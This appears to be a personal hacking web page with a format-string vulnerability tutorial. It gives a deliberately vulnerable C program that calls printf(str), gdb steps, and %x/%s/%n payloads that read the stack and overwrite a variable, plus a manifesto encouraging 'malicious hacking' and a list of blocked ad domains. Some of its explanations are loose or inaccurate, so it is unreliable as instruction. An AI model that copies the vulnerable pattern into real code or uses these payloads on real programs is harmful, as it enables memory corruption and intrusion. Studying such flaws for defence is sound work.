Create a program:
#include "stdarg.h"
#include "stdio.h"
static int i;
void main(int argc, char *argv[])
{
char str[256];
i=10;
strcpy(str, argv[1]);
printf(str);
printf("\n variable i now %d\n",i);
}
"printf(str)" is the exploitable code. A person should never use "printf(str);" because it allows the contents of str to be printed, no matter what it is. The should have been "printf("%s", str)" which forces str to be printed as a string.
After this program is writen, compile, run a debugger debugger, make a.out the debugged file, then get the address of the exploitable variable:
[root@localhost root] gcc test.c
[root@localhost root] gdb
(gdb) file a.out
(gdb) print &i
"i" will now print out something like 0x8123456
This is the memory of the exploitable variable.
Now you are going to run the program and inject exploitable machine code. "perl -e" eliminates all non-useful memory stuffs (just trust me for now). The machine code is the memory address. Notice it is writen as 6534128 instead of 8123456
Now type this (and keep in mind the difference between ` and ' )
(gdb) run `perl -e 'print "\x65\x34\x12\x08_%x_%x_%x_%n"'`
and bam, your variable i should now have a different, exploited value.
Okay, the above explains very little. To understand more of what's going on, run ./a.out at the command line. It will print whatever you put as the argument.
So doing
./a.out hello
will print out "hello". The exploit comes when you start injecting things like,
./a.out %i
or
./a.out %x
Now here's where the fun starts:
./a.out %x%x%x%x%x%x etcetc %x%x
The more x's, the more it will print out into the stack. When you see %x's = "bfffd17" or bffffsomething, then that indicates something is contained within that memory address. At this point, replace the %x with %s. This will show the contents of the memory as a string (ie root directories, paths, file associations, etc). So you may run the program as:
./a.out %x%x%x%x%x%x%x%x%s%s%s%s%s%s%x%x%x%x%x%x
earlier I mentioned "perl -e". This simply removes all the unneeded places, where we injected %x just to see where a string was located that was viewable.
Now the next step, is to find the actual address of what prints out in %s. This will allow you to (in theory) over write paths, or other variables in the computer. Hence my question to Mike. I'll play with this more and let you know!
If the human body was never exposed to ailments, it would be impressivly vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressivly vulnerable to cyber terrorism. With out the creation of a malicious hacking, Afganistan could have destroyed America's economy with a ping flood. This is why I encourange maclicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lay. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere . However if you are a publisher, I would appriciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagerize then that is my biggest compliment . If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age .
Previous hacks
Previous Hacks
This link kills spam
spam IP addresses
These are sites I block at my firewall.
cdn2.gms1.net
gms1.net
servedby.advertising.com
advertising.com
a.tribalfusion.com
tribalfusion.com
pimpslord.com
altfarm.mediaplex.com
mediaplex.com
ad.yeildmanager.com
yeildmanager.com
doubleclick.net
isg32.casalemedia.com
casalemedia.com
Two very recommended books:
. . The only hacking forum I have found worth mentioning here